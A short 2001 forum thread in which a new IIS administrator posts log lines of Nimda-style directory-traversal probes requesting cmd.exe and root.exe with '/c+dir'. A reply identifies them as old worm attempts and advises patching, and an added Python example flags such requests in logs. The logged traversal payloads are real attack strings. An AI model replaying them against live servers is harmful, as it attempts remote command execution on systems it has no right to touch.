IIS Logs

By Blaine Moore
Hi, I have just installed IIS and am looking over the logs. Oftentimes, I see something like the following lines (edited to protect the parties involved):

#Fields: date time c-ip cs-username cs-method cs-uri-stem cs-uri-query sc-status cs(Referer)
2001-10-30 12:19:49 --.---.---.--- - GET /scripts/root.exe /c+dir 401 -
2001-10-30 12:19:53 --.---.---.--- - GET /MSADC/root.exe /c+dir 401 -
2001-10-30 12:19:56 --.---.---.--- - GET /c/winnt/system32/cmd.exe /c+dir 404 -
2001-10-30 12:19:59 --.---.---.--- - GET /d/winnt/system32/cmd.exe /c+dir 404 -
2001-10-30 12:20:02 --.---.---.--- - GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-10-30 12:20:06 --.---.---.--- - GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2001-10-30 12:20:09 --.---.---.--- - GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2001-10-30 12:20:12 --.---.---.--- - GET /msadc/..%5c../..%5c../..%5c/..?../..?../..?../winnt/system32/cmd.exe /c+dir401 -
2001-10-30 12:20:16 --.---.---.--- - GET /scripts/..?../winnt/system32/cmd.exe /c+dir 401 -
2001-10-30 12:20:19 --.---.---.--- - GET /scripts/winnt/system32/cmd.exe /c+dir 401 -
2001-10-30 12:20:26 --.---.---.--- - GET /winnt/system32/cmd.exe /c+dir 404 -
2001-10-30 12:20:29 --.---.---.--- - GET /winnt/system32/cmd.exe /c+dir 404 -
2001-10-30 12:20:32 --.---.---.--- - GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-10-30 12:20:45 --.---.---.--- - GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-10-30 12:21:38 --.---.---.--- - GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-10-30 12:21:41 --.---.---.--- - GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 -

What is this person doing and is it something I need to be worried about? I have seen multiple people do things of a similar nature over the last 3 days and I'm not quite sure what it means.

IIS Logs

by scottdo10 In reply to IIS Logs

That looks like attempts on older vulnerabilities like IIS DOT DOT Execute, and NIMDA tries several different types of attempts. Just make sure your box is up to date with the latest security patches/service packs! You can try to track down where the more frequent attacks come from, but you will always get these types of things.
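An added example, not part of the original thread or any poster's code: one way to triage log lines like those in the question. It reads the `#Fields` header, flags requests whose decoded `cs-uri-stem` targets `cmd.exe` or `root.exe` or contains a traversal sequence, and lists per client any such request that was answered with a 2xx status. The sample log, its documentation-range IP addresses and the function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample in the thread's W3C field layout; IPs are documentation addresses.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-username cs-method cs-uri-stem cs-uri-query sc-status cs(Referer)
2001-10-30 12:19:49 192.0.2.10 - GET /scripts/root.exe /c+dir 401 -
2001-10-30 12:20:02 192.0.2.10 - GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-10-30 12:21:41 192.0.2.10 - GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 -
2001-10-30 12:25:00 198.51.100.7 - GET /default.htm - 200 -
2001-10-30 12:30:11 203.0.113.5 - GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
"""

SHELL_TARGET = re.compile(r"/(cmd|root)\.exe$", re.IGNORECASE)

def decode_fully(stem, rounds=3):
    """Percent-decode a few times so nested encoding cannot hide a separator."""
    for _ in range(rounds):
        stem = unquote(stem)
    return stem

def classify(stem):
    """Return the set of reasons this URI stem looks like a command-shell probe."""
    path = decode_fully(stem).replace("\\", "/")   # treat both slashes alike
    reasons = set()
    if SHELL_TARGET.search(path):
        reasons.add("shell-binary")
    if "../" in path:
        reasons.add("traversal")
    return reasons

def scan(log_text):
    """Map client IP -> {'probes': count, 'served': [stems answered with 2xx]}."""
    fields, report = [], defaultdict(lambda: {"probes": 0, "served": []})
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]              # column order comes from the header
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        if classify(row.get("cs-uri-stem", "")):
            entry = report[row["c-ip"]]
            entry["probes"] += 1
            if row.get("sc-status", "").startswith("2"):
                entry["served"].append(row["cs-uri-stem"])
    return dict(report)
```

Clients whose `served` list is empty only received 401/404 responses; a non-empty list marks requests the server actually answered and is the place to start investigating.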

IIS Logs

by Blaine Moore In reply to IIS Logs

Thanks, I figured it was something of that sort.

IIS Logs

by Blaine Moore In reply to IIS Logs

This question was closed by the author